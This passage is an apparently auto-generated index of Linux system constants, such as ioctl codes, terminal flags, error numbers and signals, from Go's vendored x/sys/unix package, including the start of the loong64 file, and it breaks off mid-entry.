TIOCGPTN (line 410) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 411) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 412) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 413) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 414) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 415) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 416) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 417) | TIOCINQ = 0x541b constant TIOCLINUX (line 418) | TIOCLINUX = 0x541c constant TIOCMBIC (line 419) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 420) | TIOCMBIS = 0x5416 constant TIOCMGET (line 421) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 422) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 423) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 424) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 425) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 426) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 427) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 428) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 429) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 430) | TIOCM_SR = 0x10 constant TIOCM_ST (line 431) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 432) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 433) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 434) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 435) | TIOCPKT = 0x5420 constant TIOCSBRK (line 436) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 437) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 438) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 439) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 440) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 441) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 442) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 443) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 444) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 445) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 446) | TIOCSETD = 0x5423 constant TIOCSIG (line 447) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 448) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 449) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 450) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 451) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 452) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 453) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 454) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 455) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 456) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 457) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 458) | TOSTOP = 0x100 constant TPIDR2_MAGIC (line 459) | TPIDR2_MAGIC = 0x54504902 constant TUNATTACHFILTER (line 460) | TUNATTACHFILTER = 0x401054d5 constant TUNDETACHFILTER (line 461) | TUNDETACHFILTER = 0x401054d6 constant TUNGETDEVNETNS (line 462) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 463) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 464) | TUNGETFILTER = 0x801054db constant TUNGETIFF (line 465) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 466) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 467) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 468) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 469) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 470) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 471) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 472) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 473) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 474) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 475) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 476) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 477) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 478) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 479) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 480) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 481) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 482) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 483) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 484) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 485) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 486) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 487) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 488) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 489) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 490) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 491) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 492) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 493) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 494) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 495) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 496) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 497) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 498) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 499) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 500) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 501) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 502) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 503) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 504) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 505) | VDISCARD = 0xd constant VEOF (line 506) | VEOF = 0x4 constant VEOL (line 507) | VEOL = 0xb constant VEOL2 (line 508) | VEOL2 = 0x10 constant VMIN (line 509) | VMIN = 0x6 constant VREPRINT (line 510) | VREPRINT = 0xc constant VSTART (line 511) | VSTART = 0x8 constant VSTOP (line 512) | VSTOP = 0x9 constant VSUSP (line 513) | VSUSP = 0xa constant VSWTC (line 514) | VSWTC = 0x7 constant VT1 (line 515) | VT1 = 0x4000 constant VTDLY (line 516) | VTDLY = 0x4000 constant VTIME (line 517) | VTIME = 0x5 constant VWERASE (line 518) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 519) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 520) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 521) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 522) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 523) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 524) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 525) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 526) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 527) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 528) | WORDSIZE = 0x40 constant XCASE (line 529) | XCASE = 0x4 constant XTABS (line 530) | XTABS = 0x1800 constant ZA_MAGIC (line 531) | ZA_MAGIC = 0x54366345 constant ZT_MAGIC (line 532) | ZT_MAGIC = 0x5a544e01 constant _HIDIOCGRAWNAME (line 533) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 534) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 535) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 540) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 541) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 542) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 543) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 544) | EALREADY = syscall.Errno(0x72) constant EBADE (line 545) | EBADE = syscall.Errno(0x34) constant EBADFD (line 546) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 547) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 548) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 549) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 550) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 551) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 552) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 553) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 554) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 555) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 556) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 557) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 558) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 559) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 560) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 561) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 562) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 563) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 564) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 565) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 566) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 567) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 568) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 569) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 570) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 571) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 572) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 573) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 574) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 575) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 576) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 577) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 578) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 579) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 580) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 581) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 582) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 583) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 584) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 585) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 586) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 587) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 588) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 589) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 590) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 591) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 592) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 593) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 594) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 595) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 596) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 597) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 598) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 599) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 600) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 601) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 602) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 603) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 604) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 605) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 606) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 607) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 608) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 609) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 610) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 611) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 612) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 613) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 614) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 615) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 616) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 617) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 618) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 619) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 620) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 621) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 622) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 623) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 624) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 625) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 626) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 627) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 628) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 629) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 630) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 631) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 632) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 633) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 634) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 635) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 636) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 637) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 638) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 643) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 644) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 645) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 646) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 647) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 648) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 649) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 650) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 651) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 652) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 653) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 654) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 655) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 656) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 657) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 658) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 659) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 660) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 661) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 662) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 663) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_loong64.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x80081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x40081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x1277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x1261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x1265 constant BLKFRASET (line 36) | BLKFRASET = 0x1264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x80081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x1260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x80081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x1278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x1279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x127b constant BLKRAGET (line 43) | BLKRAGET = 0x1263 constant BLKRASET (line 44) | BLKRASET = 0x1262 constant BLKROGET (line 45) | BLKROGET = 0x125e constant BLKROSET (line 46) | BLKROSET = 0x125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x127e constant BLKRRPART (line 48) | BLKRRPART = 0x125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x1267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x1266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x1268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x81484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x80104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x40049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x4020940d constant FLUSHO (line 87) | FLUSHO = 0x1000 constant FPU_CTX_MAGIC (line 88) | FPU_CTX_MAGIC = 0x46505501 constant FS_IOC_ENABLE_VERITY (line 89) | FS_IOC_ENABLE_VERITY = 0x40806685 constant FS_IOC_GETFLAGS (line 90) | FS_IOC_GETFLAGS = 0x80086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 91) | FS_IOC_GET_ENCRYPTION_NONCE = 0x8010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 92) | FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 93) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614 constant FS_IOC_SETFLAGS (line 94) | FS_IOC_SETFLAGS = 0x40086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 95) | FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613 constant F_GETLK (line 96) | F_GETLK = 0x5 constant F_GETLK64 (line 97) | F_GETLK64 = 0x5 constant F_GETOWN (line 98) | F_GETOWN = 0x9 constant F_RDLCK (line 99) | F_RDLCK = 0x0 constant F_SETLK (line 100) | F_SETLK = 0x6 constant F_SETLK64 (line 101) | F_SETLK64 = 0x6 constant F_SETLKW (line 102) | F_SETLKW = 0x7 constant F_SETLKW64 (line 103) | F_SETLKW64 = 0x7 constant F_SETOWN (line 104) | F_SETOWN = 0x8 constant F_UNLCK (line 105) | F_UNLCK = 0x2 constant F_WRLCK (line 106) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 107) | HIDIOCGRAWINFO = 0x80084803 constant HIDIOCGRDESC (line 108) | HIDIOCGRDESC = 0x90044802 constant HIDIOCGRDESCSIZE (line 109) | HIDIOCGRDESCSIZE = 0x80044801 constant HUPCL (line 110) | HUPCL = 0x400 constant ICANON (line 111) | ICANON = 0x2 constant IEXTEN (line 112) | IEXTEN = 0x8000 constant IN_CLOEXEC (line 113) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 114) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 115) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x7b9 constant ISIG (line 116) | ISIG = 0x1 constant IUCLC (line 117) | IUCLC = 0x200 constant IXOFF (line 118) | IXOFF = 0x1000 constant IXON (line 119) | IXON = 0x400 constant LASX_CTX_MAGIC (line 120) | LASX_CTX_MAGIC = 0x41535801 constant LBT_CTX_MAGIC (line 121) | LBT_CTX_MAGIC = 0x42540001 constant LSX_CTX_MAGIC (line 122) | LSX_CTX_MAGIC = 0x53580001 constant MAP_ANON (line 123) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 124) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 125) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 126) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 127) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 128) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 129) | MAP_LOCKED = 0x2000 constant MAP_NONBLOCK (line 130) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 131) | MAP_NORESERVE = 0x4000 constant MAP_POPULATE (line 132) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 133) | MAP_STACK = 0x20000 constant MAP_SYNC (line 134) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 135) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 136) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 137) | MCL_ONFAULT = 0x4 constant MEMERASE (line 138) | MEMERASE = 0x40084d02 constant MEMERASE64 (line 139) | MEMERASE64 = 0x40104d14 constant MEMGETBADBLOCK (line 140) | MEMGETBADBLOCK = 0x40084d0b constant MEMGETINFO (line 141) | MEMGETINFO = 0x80204d01 constant MEMGETOOBSEL (line 142) | MEMGETOOBSEL = 0x80c84d0a constant MEMGETREGIONCOUNT (line 143) | MEMGETREGIONCOUNT = 0x80044d07 constant MEMISLOCKED (line 144) | MEMISLOCKED = 0x80084d17 constant MEMLOCK (line 145) | MEMLOCK = 0x40084d05 constant MEMREAD (line 146) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 147) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 148) | MEMSETBADBLOCK = 0x40084d0c constant MEMUNLOCK (line 149) | MEMUNLOCK = 0x40084d06 constant MEMWRITEOOB (line 150) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 151) | MTDFILEMODE = 0x4d13 constant NFDBITS (line 152) | NFDBITS = 0x40 constant NLDLY (line 153) | NLDLY = 0x100 constant NOFLSH (line 154) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 155) | NS_GET_NSTYPE = 0xb703 constant NS_GET_OWNER_UID (line 156) | NS_GET_OWNER_UID = 0xb704 constant NS_GET_PARENT (line 157) | NS_GET_PARENT = 0xb702 constant NS_GET_USERNS (line 158) | NS_GET_USERNS = 0xb701 constant OLCUC (line 159) | OLCUC = 0x2 constant ONLCR (line 160) | ONLCR = 0x4 constant OTPERASE (line 161) | OTPERASE = 0x400c4d19 constant OTPGETREGIONCOUNT (line 162) | OTPGETREGIONCOUNT = 0x40044d0e constant OTPGETREGIONINFO (line 163) | OTPGETREGIONINFO = 0x400c4d0f constant OTPLOCK (line 164) | OTPLOCK = 0x800c4d10 constant OTPSELECT (line 165) | OTPSELECT = 0x80044d0d constant O_APPEND (line 166) | O_APPEND = 0x400 constant O_ASYNC (line 167) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 168) | O_CLOEXEC = 0x80000 constant O_CREAT (line 169) | O_CREAT = 0x40 constant O_DIRECT (line 170) | O_DIRECT = 0x4000 constant O_DIRECTORY (line 171) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 172) | O_DSYNC = 0x1000 constant O_EXCL (line 173) | O_EXCL = 0x80 constant O_FSYNC (line 174) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 175) | O_LARGEFILE = 0x0 constant O_NDELAY (line 176) | O_NDELAY = 0x800 constant O_NOATIME (line 177) | O_NOATIME = 0x40000 constant O_NOCTTY (line 178) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 179) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 180) | O_NONBLOCK = 0x800 constant O_PATH (line 181) | O_PATH = 0x200000 constant O_RSYNC (line 182) | O_RSYNC = 0x101000 constant O_SYNC (line 183) | O_SYNC = 0x101000 constant O_TMPFILE (line 184) | O_TMPFILE = 0x410000 constant O_TRUNC (line 185) | O_TRUNC = 0x200 constant PARENB (line 186) | PARENB = 0x100 constant PARODD (line 187) | PARODD = 0x200 constant PENDIN (line 188) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 189) | PERF_EVENT_IOC_DISABLE = 0x2401 constant PERF_EVENT_IOC_ENABLE (line 190) | PERF_EVENT_IOC_ENABLE = 0x2400 constant PERF_EVENT_IOC_ID (line 191) | PERF_EVENT_IOC_ID = 0x80082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 192) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x4008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 193) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x40042409 constant PERF_EVENT_IOC_PERIOD (line 194) | PERF_EVENT_IOC_PERIOD = 0x40082404 constant PERF_EVENT_IOC_QUERY_BPF (line 195) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 196) | PERF_EVENT_IOC_REFRESH = 0x2402 constant PERF_EVENT_IOC_RESET (line 197) | PERF_EVENT_IOC_RESET = 0x2403 constant PERF_EVENT_IOC_SET_BPF (line 198) | PERF_EVENT_IOC_SET_BPF = 0x40042408 constant PERF_EVENT_IOC_SET_FILTER (line 199) | PERF_EVENT_IOC_SET_FILTER = 0x40082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 200) | PERF_EVENT_IOC_SET_OUTPUT = 0x2405 constant PPPIOCATTACH (line 201) | PPPIOCATTACH = 0x4004743d constant PPPIOCATTCHAN (line 202) | PPPIOCATTCHAN = 0x40047438 constant PPPIOCBRIDGECHAN (line 203) | PPPIOCBRIDGECHAN = 0x40047435 constant PPPIOCCONNECT (line 